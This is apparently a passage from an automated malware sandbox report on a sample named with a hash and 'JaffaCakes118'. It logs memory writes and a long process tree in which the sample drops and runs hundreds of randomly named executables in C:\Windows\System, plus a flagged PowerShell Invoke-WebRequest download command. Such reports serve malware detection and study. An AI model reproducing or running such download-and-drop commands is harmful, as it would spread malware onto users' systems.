1048 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe SrKvmVn.exe PID 1792 wrote to memory of 4112 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ZvONovo.exe PID 1792 wrote to memory of 4112 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ZvONovo.exe PID 1792 wrote to memory of 1476 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe dtAAipU.exe PID 1792 wrote to memory of 1476 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe dtAAipU.exe PID 1792 wrote to memory of 1612 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe NPFhJtL.exe PID 1792 wrote to memory of 1612 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe NPFhJtL.exe PID 1792 wrote to memory of 2316 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe nkRiAVH.exe PID 1792 wrote to memory of 2316 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe nkRiAVH.exe PID 1792 wrote to memory of 1744 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe jSBHmVm.exe PID 1792 wrote to memory of 1744 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe jSBHmVm.exe PID 1792 wrote to memory of 4504 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe pdYcMdK.exe PID 1792 wrote to memory of 4504 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe pdYcMdK.exe PID 1792 wrote to memory of 3228 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe uWZnljm.exe PID 1792 wrote to memory of 3228 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe uWZnljm.exe PID 1792 wrote to memory of 4104 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ZjuDlfz.exe PID 1792 wrote to memory of 4104 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ZjuDlfz.exe PID 1792 wrote to memory of 1036 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe RllVBWv.exe PID 1792 wrote to memory of 1036 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe RllVBWv.exe PID 1792 wrote to memory of 1120 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe gevnQJc.exe PID 1792 wrote to memory of 1120 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe gevnQJc.exe PID 1792 wrote to memory of 2576 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe EGLkfBq.exe PID 1792 wrote to memory of 2576 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe EGLkfBq.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe"1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2076" "2964" "2900" "2968" "0" "0" "2972" "0" "0" "0" "0" "0"3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System\EPzdxmJ.exeC:\Windows\System\EPzdxmJ.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\lEphIFM.exeC:\Windows\System\lEphIFM.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\NLmhtHW.exeC:\Windows\System\NLmhtHW.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\GaDeUOV.exeC:\Windows\System\GaDeUOV.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\FCIlfiz.exeC:\Windows\System\FCIlfiz.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\PpQLMbf.exeC:\Windows\System\PpQLMbf.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\aLVJRel.exeC:\Windows\System\aLVJRel.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\kniHjbz.exeC:\Windows\System\kniHjbz.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\MZBDbbn.exeC:\Windows\System\MZBDbbn.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\YCWAzCK.exeC:\Windows\System\YCWAzCK.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\YCQPCkW.exeC:\Windows\System\YCQPCkW.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\oJKZSaj.exeC:\Windows\System\oJKZSaj.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\xlaKyRL.exeC:\Windows\System\xlaKyRL.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\iMwOmKV.exeC:\Windows\System\iMwOmKV.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\DJSRmCJ.exeC:\Windows\System\DJSRmCJ.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\uqbIoDo.exeC:\Windows\System\uqbIoDo.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\ILxUQZF.exeC:\Windows\System\ILxUQZF.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\octEPVJ.exeC:\Windows\System\octEPVJ.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\ihFXJbC.exeC:\Windows\System\ihFXJbC.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\SrKvmVn.exeC:\Windows\System\SrKvmVn.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\ZvONovo.exeC:\Windows\System\ZvONovo.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\dtAAipU.exeC:\Windows\System\dtAAipU.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\NPFhJtL.exeC:\Windows\System\NPFhJtL.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\nkRiAVH.exeC:\Windows\System\nkRiAVH.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\jSBHmVm.exeC:\Windows\System\jSBHmVm.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\pdYcMdK.exeC:\Windows\System\pdYcMdK.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\uWZnljm.exeC:\Windows\System\uWZnljm.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\ZjuDlfz.exeC:\Windows\System\ZjuDlfz.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\RllVBWv.exeC:\Windows\System\RllVBWv.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\gevnQJc.exeC:\Windows\System\gevnQJc.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\EGLkfBq.exeC:\Windows\System\EGLkfBq.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\dJwAbiB.exeC:\Windows\System\dJwAbiB.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\KcDVBgi.exeC:\Windows\System\KcDVBgi.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\zQlwXPb.exeC:\Windows\System\zQlwXPb.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\RJrOYjV.exeC:\Windows\System\RJrOYjV.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\RwcUjTt.exeC:\Windows\System\RwcUjTt.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\sFaXCeW.exeC:\Windows\System\sFaXCeW.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\kFKhBGU.exeC:\Windows\System\kFKhBGU.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\QaBgSKa.exeC:\Windows\System\QaBgSKa.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\MLUtovq.exeC:\Windows\System\MLUtovq.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\sWHvpHa.exeC:\Windows\System\sWHvpHa.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\ZPsUxhc.exeC:\Windows\System\ZPsUxhc.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\zEVFhGx.exeC:\Windows\System\zEVFhGx.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\cocwQFb.exeC:\Windows\System\cocwQFb.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\wxtPVCw.exeC:\Windows\System\wxtPVCw.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\xEvPYbG.exeC:\Windows\System\xEvPYbG.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\xewRAKe.exeC:\Windows\System\xewRAKe.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\eJOHVru.exeC:\Windows\System\eJOHVru.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\aCihzoy.exeC:\Windows\System\aCihzoy.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\bAYIqay.exeC:\Windows\System\bAYIqay.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\TNzCBDg.exeC:\Windows\System\TNzCBDg.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\SsStims.exeC:\Windows\System\SsStims.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\yWRcpSb.exeC:\Windows\System\yWRcpSb.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\BzvCewk.exeC:\Windows\System\BzvCewk.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\BXZNMVK.exeC:\Windows\System\BXZNMVK.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\XsrhVBQ.exeC:\Windows\System\XsrhVBQ.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\SXVeist.exeC:\Windows\System\SXVeist.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\LpilbuL.exeC:\Windows\System\LpilbuL.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\xWaMUHI.exeC:\Windows\System\xWaMUHI.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\lemBfVQ.exeC:\Windows\System\lemBfVQ.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\jdonHqO.exeC:\Windows\System\jdonHqO.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\eYJwEDu.exeC:\Windows\System\eYJwEDu.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\lIVltdz.exeC:\Windows\System\lIVltdz.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\jHFcuUK.exeC:\Windows\System\jHFcuUK.exe2⤵
- Executes dropped EXE
-
C:\Windows\System\NAFPlkL.exeC:\Windows\System\NAFPlkL.exe2⤵
-
C:\Windows\System\aFZjPci.exeC:\Windows\System\aFZjPci.exe2⤵
-
C:\Windows\System\aJlfNeI.exeC:\Windows\System\aJlfNeI.exe2⤵
-
C:\Windows\System\kBFuOIh.exeC:\Windows\System\kBFuOIh.exe2⤵
-
C:\Windows\System\vkwUhFp.exeC:\Windows\System\vkwUhFp.exe2⤵
-
C:\Windows\System\BATZTzB.exeC:\Windows\System\BATZTzB.exe2⤵
-
C:\Windows\System\mzQIzDv.exeC:\Windows\System\mzQIzDv.exe2⤵
-
C:\Windows\System\rZxNlhg.exeC:\Windows\System\rZxNlhg.exe2⤵
-
C:\Windows\System\NQSwSRL.exeC:\Windows\System\NQSwSRL.exe2⤵
-
C:\Windows\System\hjcGycg.exeC:\Windows\System\hjcGycg.exe2⤵
-
C:\Windows\System\yGBJYiN.exeC:\Windows\System\yGBJYiN.exe2⤵
-
C:\Windows\System\YJNPpMu.exeC:\Windows\System\YJNPpMu.exe2⤵
-
C:\Windows\System\seIzFGu.exeC:\Windows\System\seIzFGu.exe2⤵
-
C:\Windows\System\OwNKsWf.exeC:\Windows\System\OwNKsWf.exe2⤵
-
C:\Windows\System\ZszMRyx.exeC:\Windows\System\ZszMRyx.exe2⤵
-
C:\Windows\System\AOHSdkh.exeC:\Windows\System\AOHSdkh.exe2⤵
-
C:\Windows\System\idgMhNR.exeC:\Windows\System\idgMhNR.exe2⤵
-
C:\Windows\System\ffeWskC.exeC:\Windows\System\ffeWskC.exe2⤵
-
C:\Windows\System\bMurqkk.exeC:\Windows\System\bMurqkk.exe2⤵
-
C:\Windows\System\oNIHsPP.exeC:\Windows\System\oNIHsPP.exe2⤵
-
C:\Windows\System\QKuQHyb.exeC:\Windows\System\QKuQHyb.exe2⤵
-
C:\Windows\System\oFgEabz.exeC:\Windows\System\oFgEabz.exe2⤵
-
C:\Windows\System\PLeTNAj.exeC:\Windows\System\PLeTNAj.exe2⤵
-
C:\Windows\System\YxGMsRm.exeC:\Windows\System\YxGMsRm.exe2⤵
-
C:\Windows\System\huAUhzf.exeC:\Windows\System\huAUhzf.exe2⤵
-
C:\Windows\System\BhAkSBD.exeC:\Windows\System\BhAkSBD.exe2⤵
-
C:\Windows\System\CBkqyQc.exeC:\Windows\System\CBkqyQc.exe2⤵
-
C:\Windows\System\TxiETEt.exeC:\Windows\System\TxiETEt.exe2⤵
-
C:\Windows\System\lgQGCgY.exeC:\Windows\System\lgQGCgY.exe2⤵
-
C:\Windows\System\aTNqkIE.exeC:\Windows\System\aTNqkIE.exe2⤵
-
C:\Windows\System\vNPaEKs.exeC:\Windows\System\vNPaEKs.exe2⤵
-
C:\Windows\System\FORbKay.exeC:\Windows\System\FORbKay.exe2⤵
-
C:\Windows\System\AvEJmAp.exeC:\Windows\System\AvEJmAp.exe2⤵
-
C:\Windows\System\ebyeBMj.exeC:\Windows\System\ebyeBMj.exe2⤵
-
C:\Windows\System\AzGvsxY.exeC:\Windows\System\AzGvsxY.exe2⤵
-
C:\Windows\System\oxSCOPe.exeC:\Windows\System\oxSCOPe.exe2⤵
-
C:\Windows\System\yPZPFWM.exeC:\Windows\System\yPZPFWM.exe2⤵
-
C:\Windows\System\imYqBdC.exeC:\Windows\System\imYqBdC.exe2⤵
-
C:\Windows\System\kGRDXnu.exeC:\Windows\System\kGRDXnu.exe2⤵
-
C:\Windows\System\tnQihlV.exeC:\Windows\System\tnQihlV.exe2⤵
-
C:\Windows\System\TJycgqE.exeC:\Windows\System\TJycgqE.exe2⤵
-
C:\Windows\System\qtFUJpC.exeC:\Windows\System\qtFUJpC.exe2⤵
-
C:\Windows\System\tMRnsqQ.exeC:\Windows\System\tMRnsqQ.exe2⤵
-
C:\Windows\System\bkAOvwx.exeC:\Windows\System\bkAOvwx.exe2⤵
-
C:\Windows\System\QJkTiTk.exeC:\Windows\System\QJkTiTk.exe2⤵
-
C:\Windows\System\IopnVnq.exeC:\Windows\System\IopnVnq.exe2⤵
-
C:\Windows\System\rXHnRQn.exeC:\Windows\System\rXHnRQn.exe2⤵
-
C:\Windows\System\oqZrrRW.exeC:\Windows\System\oqZrrRW.exe2⤵
-
C:\Windows\System\xZYremt.exeC:\Windows\System\xZYremt.exe2⤵
-
C:\Windows\System\DBeGaoU.exeC:\Windows\System\DBeGaoU.exe2⤵
-
C:\Windows\System\CGwmZQH.exeC:\Windows\System\CGwmZQH.exe2⤵
-
C:\Windows\System\BnfzGXc.exeC:\Windows\System\BnfzGXc.exe2⤵
-
C:\Windows\System\hVdUJWx.exeC:\Windows\System\hVdUJWx.exe2⤵
-
C:\Windows\System\lDextNj.exeC:\Windows\System\lDextNj.exe2⤵
-
C:\Windows\System\PzLHsak.exeC:\Windows\System\PzLHsak.exe2⤵
-
C:\Windows\System\ansioEh.exeC:\Windows\System\ansioEh.exe2⤵
-
C:\Windows\System\EiyqwaR.exeC:\Windows\System\EiyqwaR.exe2⤵
-
C:\Windows\System\GmFBCnL.exeC:\Windows\System\GmFBCnL.exe2⤵
-
C:\Windows\System\mWwoWRN.exeC:\Windows\System\mWwoWRN.exe2⤵
-
C:\Windows\System\SbYWxKY.exeC:\Windows\System\SbYWxKY.exe2⤵
-
C:\Windows\System\Gznkbgk.exeC:\Windows\System\Gznkbgk.exe2⤵
-
C:\Windows\System\boRnkKt.exeC:\Windows\System\boRnkKt.exe2⤵
-
C:\Windows\System\VldtsdV.exeC:\Windows\System\VldtsdV.exe2⤵
-
C:\Windows\System\euQUday.exeC:\Windows\System\euQUday.exe2⤵
-
C:\Windows\System\rNeRkyu.exeC:\Windows\System\rNeRkyu.exe2⤵
-
C:\Windows\System\raSwURQ.exeC:\Windows\System\raSwURQ.exe2⤵
-
C:\Windows\System\ixffnoF.exeC:\Windows\System\ixffnoF.exe2⤵
-
C:\Windows\System\EgvqgbC.exeC:\Windows\System\EgvqgbC.exe2⤵
-
C:\Windows\System\JLlhJTj.exeC:\Windows\System\JLlhJTj.exe2⤵
-
C:\Windows\System\QTZoFkr.exeC:\Windows\System\QTZoFkr.exe2⤵
-
C:\Windows\System\oCeTEog.exeC:\Windows\System\oCeTEog.exe2⤵
-
C:\Windows\System\KwdgwbA.exeC:\Windows\System\KwdgwbA.exe2⤵
-
C:\Windows\System\nuuBhtf.exeC:\Windows\System\nuuBhtf.exe2⤵
-
C:\Windows\System\RRmWHad.exeC:\Windows\System\RRmWHad.exe2⤵
-
C:\Windows\System\jujscYP.exeC:\Windows\System\jujscYP.exe2⤵
-
C:\Windows\System\BVmNUYe.exeC:\Windows\System\BVmNUYe.exe2⤵
-
C:\Windows\System\GFzfZHH.exeC:\Windows\System\GFzfZHH.exe2⤵
-
C:\Windows\System\jzxawjp.exeC:\Windows\System\jzxawjp.exe2⤵
-
C:\Windows\System\gnNEACS.exeC:\Windows\System\gnNEACS.exe2⤵
-
C:\Windows\System\eMcXwLs.exeC:\Windows\System\eMcXwLs.exe2⤵
-
C:\Windows\System\idJhDCY.exeC:\Windows\System\idJhDCY.exe2⤵
-
C:\Windows\System\ijNvwyF.exeC:\Windows\System\ijNvwyF.exe2⤵
-
C:\Windows\System\PUEmolE.exeC:\Windows\System\PUEmolE.exe2⤵
-
C:\Windows\System\ctHTCWf.exeC:\Windows\System\ctHTCWf.exe2⤵
-
C:\Windows\System\PTUMovl.exeC:\Windows\System\PTUMovl.exe2⤵
-
C:\Windows\System\sHqxyLG.exeC:\Windows\System\sHqxyLG.exe2⤵
-
C:\Windows\System\PnZtFlm.exeC:\Windows\System\PnZtFlm.exe2⤵
-
C:\Windows\System\QCvkJzs.exeC:\Windows\System\QCvkJzs.exe2⤵
-
C:\Windows\System\epCYrSR.exeC:\Windows\System\epCYrSR.exe2⤵
-
C:\Windows\System\grwqagK.exeC:\Windows\System\grwqagK.exe2⤵
-
C:\Windows\System\DAwvhfk.exeC:\Windows\System\DAwvhfk.exe2⤵
-
C:\Windows\System\qiOmxLj.exeC:\Windows\System\qiOmxLj.exe2⤵
-
C:\Windows\System\JhVGMhn.exeC:\Windows\System\JhVGMhn.exe2⤵
-
C:\Windows\System\CHrRPtg.exeC:\Windows\System\CHrRPtg.exe2⤵
-
C:\Windows\System\YbTEgFC.exeC:\Windows\System\YbTEgFC.exe2⤵
-
C:\Windows\System\npSzOhC.exeC:\Windows\System\npSzOhC.exe2⤵
-
C:\Windows\System\jJMCfCI.exeC:\Windows\System\jJMCfCI.exe2⤵
-
C:\Windows\System\ULHtAFp.exeC:\Windows\System\ULHtAFp.exe2⤵
-
C:\Windows\System\CBRKdzG.exeC:\Windows\System\CBRKdzG.exe2⤵
-
C:\Windows\System\luzkOgT.exeC:\Windows\System\luzkOgT.exe2⤵
-
C:\Windows\System\ATlxpup.exeC:\Windows\System\ATlxpup.exe2⤵
-
C:\Windows\System\uelihAU.exeC:\Windows\System\uelihAU.exe2⤵
-
C:\Windows\System\MUVOwuK.exeC:\Windows\System\MUVOwuK.exe2⤵
-
C:\Windows\System\ZZowTfu.exeC:\Windows\System\ZZowTfu.exe2⤵
-
C:\Windows\System\InHJjKK.exeC:\Windows\System\InHJjKK.exe2⤵
-
C:\Windows\System\qwVRfsa.exeC:\Windows\System\qwVRfsa.exe2⤵
-
C:\Windows\System\uEwswdR.exeC:\Windows\System\uEwswdR.exe2⤵
-
C:\Windows\System\jcLUBAf.exeC:\Windows\System\jcLUBAf.exe2⤵
-
C:\Windows\System\wOLehvv.exeC:\Windows\System\wOLehvv.exe2⤵
-
C:\Windows\System\cvCTKVy.exeC:\Windows\System\cvCTKVy.exe2⤵
-
C:\Windows\System\XnVJtTI.exeC:\Windows\System\XnVJtTI.exe2⤵
-
C:\Windows\System\aoodnaM.exeC:\Windows\System\aoodnaM.exe2⤵
-
C:\Windows\System\qaRdBJu.exeC:\Windows\System\qaRdBJu.exe2⤵
-
C:\Windows\System\UwByweI.exeC:\Windows\System\UwByweI.exe2⤵
-
C:\Windows\System\LxjkXsM.exeC:\Windows\System\LxjkXsM.exe2⤵
-
C:\Windows\System\VhCNptc.exeC:\Windows\System\VhCNptc.exe2⤵
-
C:\Windows\System\zuUtntm.exeC:\Windows\System\zuUtntm.exe2⤵
-
C:\Windows\System\WTwfKPj.exeC:\Windows\System\WTwfKPj.exe2⤵
-
C:\Windows\System\mDwtMDi.exeC:\Windows\System\mDwtMDi.exe2⤵
-
C:\Windows\System\MjaVgSs.exeC:\Windows\System\MjaVgSs.exe2⤵
-
C:\Windows\System\DZoSxKh.exeC:\Windows\System\DZoSxKh.exe2⤵
-
C:\Windows\System\CorsrQi.exeC:\Windows\System\CorsrQi.exe2⤵
-
C:\Windows\System\maSKCGR.exeC:\Windows\System\maSKCGR.exe2⤵
-
C:\Windows\System\AgcLPRU.exeC:\Windows\System\AgcLPRU.exe2⤵
-
C:\Windows\System\TOAbQdg.exeC:\Windows\System\TOAbQdg.exe2⤵
-
C:\Windows\System\ZUjrfjL.exeC:\Windows\System\ZUjrfjL.exe2⤵
-
C:\Windows\System\rhgRyCL.exeC:\Windows\System\rhgRyCL.exe2⤵
-
C:\Windows\System\pZztSLK.exeC:\Windows\System\pZztSLK.exe2⤵
-
C:\Windows\System\YVWUHCV.exeC:\Windows\System\YVWUHCV.exe2⤵
-
C:\Windows\System\jJwmCSD.exeC:\Windows\System\jJwmCSD.exe2⤵
-
C:\Windows\System\SiflLRk.exeC:\Windows\System\SiflLRk.exe2⤵
-
C:\Windows\System\aeCWJng.exeC:\Windows\System\aeCWJng.exe2⤵
-
C:\Windows\System\CrfUWwH.exeC:\Windows\System\CrfUWwH.exe2⤵
-
C:\Windows\System\IhFyOSK.exeC:\Windows\System\IhFyOSK.exe2⤵
-
C:\Windows\System\EsaSQfn.exeC:\Windows\System\EsaSQfn.exe2⤵
-
C:\Windows\System\YluONIf.exeC:\Windows\System\YluONIf.exe2⤵
-
C:\Windows\System\TLEXsRr.exeC:\Windows\System\TLEXsRr.exe2⤵
-
C:\Windows\System\ZhZUFuE.exeC:\Windows\System\ZhZUFuE.exe2⤵
-
C:\Windows\System\APZOhBj.exeC:\Windows\System\APZOhBj.exe2⤵
-
C:\Windows\System\kALvuIn.exeC:\Windows\System\kALvuIn.exe2⤵
-
C:\Windows\System\jhLETKv.exeC:\Windows\System\jhLETKv.exe2⤵
-
C:\Windows\System\miYmZRw.exeC:\Windows\System\miYmZRw.exe2⤵
-
C:\Windows\System\BBLAqEc.exeC:\Windows\System\BBLAqEc.exe2⤵
-
C:\Windows\System\MKlmcuK.exeC:\Windows\System\MKlmcuK.exe2⤵
-
C:\Windows\System\YRhpbkh.exeC:\Windows\System\YRhpbkh.exe2⤵
-
C:\Windows\System\MwjGcIW.exeC:\Windows\System\MwjGcIW.exe2⤵
-
C:\Windows\System\XtjDIJD.exeC:\Windows\System\XtjDIJD.exe2⤵
-
C:\Windows\System\BpKHnik.exeC:\Windows\System\BpKHnik.exe2⤵
-
C:\Windows\System\FEiXTAO.exeC:\Windows\System\FEiXTAO.exe2⤵
-
C:\Windows\System\SQztKfq.exeC:\Windows\System\SQztKfq.exe2⤵
-
C:\Windows\System\xaTzJPX.exeC:\Windows\System\xaTzJPX.exe2⤵
-
C:\Windows\System\RFhKopI.exeC:\Windows\System\RFhKopI.exe2⤵
-
C:\Windows\System\kfyMUWU.exeC:\Windows\System\kfyMUWU.exe2⤵
-
C:\Windows\System\TKyyEDB.exeC:\Windows\System\TKyyEDB.exe2⤵
-
C:\Windows\System\HpQCCiz.exeC:\Windows\System\HpQCCiz.exe2⤵
-
C:\Windows\System\zJovaei.exeC:\Windows\System\zJovaei.exe2⤵
-
C:\Windows\System\UzltYuo.exeC:\Windows\System\UzltYuo.exe2⤵
-
C:\Windows\System\Iafobuu.exeC:\Windows\System\Iafobuu.exe2⤵
-
C:\Windows\System\KtluNFt.exeC:\Windows\System\KtluNFt.exe2⤵
-
C:\Windows\System\etzCDPd.exeC:\Windows\System\etzCDPd.exe2⤵
-
C:\Windows\System\kjnzYsH.exeC:\Windows\System\kjnzYsH.exe2⤵
-
C:\Windows\System\CYhGdNm.exeC:\Windows\System\CYhGdNm.exe2⤵
-
C:\Windows\System\LFpkjnK.exeC:\Windows\System\LFpkjnK.exe2⤵
-
C:\Windows\System\wNWmtXd.exeC:\Windows\System\wNWmtXd.exe2⤵
-
C:\Windows\System\JkJtLMY.exeC:\Windows\System\JkJtLMY.exe2⤵
-
C:\Windows\System\vGJvtpb.exeC:\Windows\System\vGJvtpb.exe2⤵
-
C:\Windows\System\GymCUBO.exeC:\Windows\System\GymCUBO.exe2⤵
-
C:\Windows\System\GktZqjb.exeC:\Windows\System\GktZqjb.exe2⤵
-
C:\Windows\System\WAHyefZ.exeC:\Windows\System\WAHyefZ.exe2⤵
-
C:\Windows\System\GoTEmGl.exeC:\Windows\System\GoTEmGl.exe2⤵
-
C:\Windows\System\HOVbmTQ.exeC:\Windows\System\HOVbmTQ.exe2⤵
-
C:\Windows\System\IPlKHMe.exeC:\Windows\System\IPlKHMe.exe2⤵
-
C:\Windows\System\zkTmxSU.exeC:\Windows\System\zkTmxSU.exe2⤵
-
C:\Windows\System\iliAKUs.exeC:\Windows\System\iliAKUs.exe2⤵
-
C:\Windows\System\FnuLVPS.exeC:\Windows\System\FnuLVPS.exe2⤵
-
C:\Windows\System\nfohsiF.exeC:\Windows\System\nfohsiF.exe2⤵
-
C:\Windows\System\gAocMim.exeC:\Windows\System\gAocMim.exe2⤵
-
C:\Windows\System\cfoQcbX.exeC:\Windows\System\cfoQcbX.exe2⤵
-
C:\Windows\System\tpJPKIM.exeC:\Windows\System\tpJPKIM.exe2⤵
-
C:\Windows\System\fqEzEjS.exeC:\Windows\System\fqEzEjS.exe2⤵
-
C:\Windows\System\hQUVKfq.exeC:\Windows\System\hQUVKfq.exe2⤵
-
C:\Windows\System\JWgGMyb.exeC:\Windows\System\JWgGMyb.exe2⤵
-
C:\Windows\System\ShLrnid.exeC:\Windows\System\ShLrnid.exe2⤵
-
C:\Windows\System\yEMiyAh.exeC:\Windows\System\yEMiyAh.exe2⤵
-
C:\Windows\System\oPCCzWK.exeC:\Windows\System\oPCCzWK.exe2⤵
-
C:\Windows\System\gcbFtAv.exeC:\Windows\System\gcbFtAv.exe2⤵
-
C:\Windows\System\xvUXsKr.exeC:\Windows\System\xvUXsKr.exe2⤵
-
C:\Windows\System\QTwlcid.exeC:\Windows\System\QTwlcid.exe2⤵
-
C:\Windows\System\JDxoztr.exeC:\Windows\System\JDxoztr.exe2⤵
-
C:\Windows\System\mDpWiZr.exeC:\Windows\System\mDpWiZr.exe2⤵
-
C:\Windows\System\CEyBgVP.exeC:\Windows\System\CEyBgVP.exe2⤵
-
C:\Windows\System\bWXhVzj.exeC:\Windows\System\bWXhVzj.exe2⤵
-
C:\Windows\System\eUTeanZ.exeC:\Windows\System\eUTeanZ.exe2⤵
-
C:\Windows\System\rpXeGhu.exeC:\Windows\System\rpXeGhu.exe2⤵
-
C:\Windows\System\NdjGNxm.exeC:\Windows\System\NdjGNxm.exe2⤵
-
C:\Windows\System\WLNWOEj.exeC:\Windows\System\WLNWOEj.exe2⤵
-
C:\Windows\System\PNJdpop.exeC:\Windows\System\PNJdpop.exe2⤵
-
C:\Windows\System\DhYFwld.exeC:\Windows\System\DhYFwld.exe2⤵
-
C:\Windows\System\xhBCoLF.exeC:\Windows\System\xhBCoLF.exe2⤵
-
C:\Windows\System\qyjlnAl.exeC:\Windows\System\qyjlnAl.exe2⤵
-
C:\Windows\System\EsdAefp.exeC:\Windows\System\EsdAefp.exe2⤵
-
C:\Windows\System\VVFhdij.exeC:\Windows\System\VVFhdij.exe2⤵
-
C:\Windows\System\tiUicxe.exeC:\Windows\System\tiUicxe.exe2⤵
-
C:\Windows\System\wHSKQRs.exeC:\Windows\System\wHSKQRs.exe2⤵
-
C:\Windows\System\wlHEChG.exeC:\Windows\System\wlHEChG.exe2⤵
-
C:\Windows\System\jXZfRds.exeC:\Windows\System\jXZfRds.exe2⤵
-
C:\Windows\System\oxXlkyG.exeC:\Windows\System\oxXlkyG.exe2⤵
-
C:\Windows\System\ZSwEWTO.exeC:\Windows\System\ZSwEWTO.exe2⤵
-
C:\Windows\System\XDoCgnu.exeC:\Windows\System\XDoCgnu.exe2⤵
-
C:\Windows\System\Kevbnkq.exeC:\Windows\System\Kevbnkq.exe2⤵
-
C:\Windows\System\CkCCiUA.exeC:\Windows\System\CkCCiUA.exe2⤵
-
C:\Windows\System\QcnLYsq.exeC:\Windows\System\QcnLYsq.exe2⤵
-
C:\Windows\System\HHkIDwR.exeC:\Windows\System\HHkIDwR.exe2⤵
-
C:\Windows\System\KVHChZy.exeC:\Windows\System\KVHChZy.exe2⤵
-
C:\Windows\System\NgMqoik.exeC:\Windows\System\NgMqoik.exe2⤵
-
C:\Windows\System\NEXGtCX.exeC:\Windows\System\NEXGtCX.exe2⤵
-
